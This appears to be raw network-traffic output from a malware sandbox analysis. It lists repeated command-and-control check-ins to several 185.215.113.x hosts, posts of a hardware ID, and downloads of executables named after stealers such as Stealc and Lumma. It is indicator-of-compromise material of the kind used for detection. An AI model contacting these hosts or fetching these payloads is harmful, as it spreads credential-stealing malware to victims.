Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /Nework.exe HTTP/1.1Host: 185.215.113.26
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000005001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000005001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 2d 2d 0d 0a Data Ascii: ------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="build"save------HJJEHJJKJEGHJJKEBFBG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000005001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAKHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 2d 2d 0d 0a Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="build"save------JDAFBKECAKFCAAAKJDAK--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: GET /inc/needmoney.exe HTTP/1.1Host: 185.215.113.117If-Modified-Since: Thu, 12 Sep 2024 13:56:06 GMTIf-None-Match: "66e2f2f6-414a00"
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000191001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000191001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000191001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/penis.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e0=1000254001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /dobre/acentric.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000284001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000285001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /dobre/splwow64.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000287001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/crypted.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000290001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.100
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000308001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/LummaC222222.exe HTTP/1.1Host: 185.215.113.117
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
